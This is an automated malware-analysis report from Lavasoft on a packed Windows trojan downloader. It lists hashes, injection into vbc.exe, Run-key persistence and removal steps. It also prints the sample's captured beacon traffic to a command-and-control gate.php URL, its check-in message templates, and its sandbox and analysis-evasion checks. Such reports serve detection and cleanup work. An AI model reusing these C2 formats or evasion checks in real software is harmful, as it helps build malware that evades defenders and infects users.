HEUR:Trojan.Win32.Generic (Kaspersky), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: edf2199994d1a0ef2730391774b0574f
SHA1: b8da3f1c4df1b32e1a973fd2fe7b965a1ea19d9a
SHA256: 1b059fab27aa0661a8336e136fead7ba5115a5178e7f73f186240131683a44ef
SSDeep: 3072:dBWg0WcuUvpEZ/Tqqz47VJ0LrkGODhl/0UrVWCk/EBR8imt:XWg8AT7uJUrxK8N8BaV
Size: 153600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-18 23:14:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
vbc.exe:504
%original file name%.exe:580
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process vbc.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)
The Trojan deletes the following file(s):
%WinDir%\1418334051\lsass (0 bytes)
The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)
Registry activity
The process vbc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 15 D5 47 EE D9 7D 16 93 8E BB 89 56 D7 FA 6B"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*1418334051"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 95 A7 72 0B 01 21 FF C6 1D EC FB 88 94 38 44"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"
Dropped PE files
MD5 | File path |
---|---|
67f5238229333c061092f5a32e8c2ee1 | c:\WINDOWS\1418334051\lsass |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: dge
Product Version: 1.0.0.0
Legal Copyright: Copyright (c)
Legal Trademarks:
Original Filename: dge3.exe
Internal Name: dge3.exe
File Version: 1.0.0.0
File Description: dge
Comments:
Language: English
Company Name: Product Name: dgeProduct Version: 1.0.0.0Legal Copyright: Copyright (c) Legal Trademarks: Original Filename: dge3.exeInternal Name: dge3.exeFile Version: 1.0.0.0File Description: dgeComments: Language: English
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 150612 | 151040 | 5.42786 | 270f60416938301061a7d215a3dac394 |
.rsrc | 163840 | 1296 | 1536 | 2.64395 | 4a52917006d4306a7fe177d678015a9f |
.reloc | 172032 | 12 | 512 | 0.070639 | 79737747aaf2d243a456ab7612074458 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://hacka4life.atwebpages.com/panel/gate.php | 83.125.22.211 |
hxxp://hacka4life.atwebpages.com:80/panel/gate.php | 83.125.22.211 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 436
a=dnNwbW5raGlmY2RheHVnYnl0cW9sd3JqZXo6d3Rxcm9saWpnZGVieXp1cG1raGN4ZmFzbnY=&b=gHR5dGU6drVfZWF0gHVqZDcyMTisMDRsMDd3NDU0MTEyZTJiODFiOGQ4MDZlNsE3MsY5NrZ8drFkOsQmgGJaX2kqpGyxZDcfgGJaX2ZqpGVvOsB8Yrkgb2V5dvcfgGJ1d3l6ZrFtd2V8&c=vvsspqqnnroolllijjggddeb
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:50 GMT
Server: Apache
Content-Length: 60
Connection: close
Con
POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468
a=bGlmZ2RlYnl6d3Rxcm9tanh1c3BraGNuYXY6dnNwbW5raGlmY3pheHVxbGdkeXRvYmV3cmo=&b=pHR5eGU6h25pZXbvY3g1rWQ6MTE4YfA0YfA3NfQ1NDEgMWUiYTmgYTboODA2ZDYgNfI2OTZqpHBirXY6YWRzrW58YXJlrDt4ODZ8Z2VdZDtoZXNxnG9cpGNjeqVfOlF8h3M6V19YUHg2ZXI6nlEdMC44pG5vnDu0LlB8hqV3OlF8&c=ebcczzzwxuuurrsopmmmjjkh
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:44 GMT
Server: Apache
Content-Length: 60
Connection: close
Content-Type: text/html
ZWJjY3p6end4dXV1cnJzb3BtbW1qamtoZonynWRHVwvohUZfUFRxn2ZBPT0K..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
vbc.exe_504:
.text
.text
P`.data
P`.data
.rdata
.rdata
`@.eh_fram
`@.eh_fram
0@.bss
0@.bss
.idata
.idata
tL
tL
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
libgcj-13.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
%s--%s
%s--%s
%s\B%i.tmp
%s\B%i.tmp
http.
http.
hXXp://
hXXp://
hXXps://
hXXps://
%y%m%d
%y%m%d
%s:%i
%s:%i
%s\browser%li.html
%s\browser%li.html
%s "%s"
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
NoWindowsUpdate
%s@%s
%s@%s
%s\I%li.bat
%s\I%li.bat
%s\U%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Google Chrome
Opera
Opera
Firefox
Firefox
chrome.exe
chrome.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
iexplore.exe
iexplore.exe
Maxthon.exe
Maxthon.exe
%s(%s)
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s%s%i%s%s%s%s%s
%s:%s
%s:%s
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
autoruns.exe
explorer.exe
explorer.exe
SbieDll.dll
SbieDll.dll
snxhk.dll
snxhk.dll
dbghelp.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-640-1457236-23837
76487-644-3177037-23510
76487-644-3177037-23510
55274-640-2673064-23950
55274-640-2673064-23950
76497-640-6308873-23835
76497-640-6308873-23835
Windows Task Manager
Windows Task Manager
%s %i %i
%s %i %i
.hidden
.hidden
filesearch.stop
filesearch.stop
%s@%s:%i
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
%s\Microsoft.NET\Framework\
v4.0.30319
v4.0.30319
v2.0.50727
v2.0.50727
\explorer.exe
\explorer.exe
HTTP/1.
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.
HTTP/1.
dnsapi.dll
dnsapi.dll
%s & %s
%s & %s
Software\Microsoft\Windows\CurrentVersion\
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
\Microsoft\Windows
%s%s%s%s%i%s%s
%s%s%s%s%i%s%s
:Zone.Identifier
:Zone.Identifier
%s\K%li.bat
%s\K%li.bat
document.write(unescape('%s'));
document.write(unescape('%s'));
operator
operator
operator
operator
global constructors keyed to
global constructors keyed to
global destructors keyed to
global destructors keyed to
operator""
operator""
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
fc_key
fc_key
use_fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
v1.0.8
panel/gate.php
panel/gate.php
hacka4life.atwebpages.com
hacka4life.atwebpages.com
%WinDir%
%WinDir%
%Program Files%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051
%WinDir%\1418334051\lsass
%WinDir%\1418334051\lsass
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
GetProcessHeap
GetProcessHeap
ShellExecuteA
ShellExecuteA
InternetOpenUrlA
InternetOpenUrlA
ADVAPI32.DLL
ADVAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
msvcrt.dll
msvcrt.dll
SHELL32.DLL
SHELL32.DLL
USER32.dll
USER32.dll
WININET.DLL
WININET.DLL
Okernel32.dll
Okernel32.dll
advapi32.dll
advapi32.dll
Aicmp.dll
Aicmp.dll
surlmon.dll
surlmon.dll
gws2_32.dll
gws2_32.dll
rpcrt4.dll
rpcrt4.dll
vbc.exe_504_rwx_00400000_00083000:
.text
.text
P`.data
P`.data
.rdata
.rdata
`@.eh_fram
`@.eh_fram
0@.bss
0@.bss
.idata
.idata
tL
tL
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
libgcj-13.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
%s--%s
%s--%s
%s\B%i.tmp
%s\B%i.tmp
http.
http.
hXXp://
hXXp://
hXXps://
hXXps://
%y%m%d
%y%m%d
%s:%i
%s:%i
%s\browser%li.html
%s\browser%li.html
%s "%s"
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
NoWindowsUpdate
%s@%s
%s@%s
%s\I%li.bat
%s\I%li.bat
%s\U%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Google Chrome
Opera
Opera
Firefox
Firefox
chrome.exe
chrome.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
iexplore.exe
iexplore.exe
Maxthon.exe
Maxthon.exe
%s(%s)
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s%s%i%s%s%s%s%s
%s:%s
%s:%s
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
autoruns.exe
explorer.exe
explorer.exe
SbieDll.dll
SbieDll.dll
snxhk.dll
snxhk.dll
dbghelp.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-640-1457236-23837
76487-644-3177037-23510
76487-644-3177037-23510
55274-640-2673064-23950
55274-640-2673064-23950
76497-640-6308873-23835
76497-640-6308873-23835
Windows Task Manager
Windows Task Manager
%s %i %i
%s %i %i
.hidden
.hidden
filesearch.stop
filesearch.stop
%s@%s:%i
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
%s\Microsoft.NET\Framework\
v4.0.30319
v4.0.30319
v2.0.50727
v2.0.50727
\explorer.exe
\explorer.exe
HTTP/1.
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.
HTTP/1.
dnsapi.dll
dnsapi.dll
%s & %s
%s & %s
Software\Microsoft\Windows\CurrentVersion\
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
\Microsoft\Windows
%s%s%s%s%i%s%s
%s%s%s%s%i%s%s
:Zone.Identifier
:Zone.Identifier
%s\K%li.bat
%s\K%li.bat
document.write(unescape('%s'));
document.write(unescape('%s'));
operator
operator
operator
operator
global constructors keyed to
global constructors keyed to
global destructors keyed to
global destructors keyed to
operator""
operator""
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
fc_key
fc_key
use_fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
v1.0.8
panel/gate.php
panel/gate.php
hacka4life.atwebpages.com
hacka4life.atwebpages.com
%WinDir%
%WinDir%
%Program Files%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051
%WinDir%\1418334051\lsass
%WinDir%\1418334051\lsass
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
GetProcessHeap
GetProcessHeap
ShellExecuteA
ShellExecuteA
InternetOpenUrlA
InternetOpenUrlA
ADVAPI32.DLL
ADVAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
msvcrt.dll
msvcrt.dll
SHELL32.DLL
SHELL32.DLL
USER32.dll
USER32.dll
WININET.DLL
WININET.DLL
Okernel32.dll
Okernel32.dll
advapi32.dll
advapi32.dll
Aicmp.dll
Aicmp.dll
surlmon.dll
surlmon.dll
gws2_32.dll
gws2_32.dll
rpcrt4.dll
rpcrt4.dll
%original file name%.exe_580_rwx_00CE0000_00001000:
..hx%
..hx%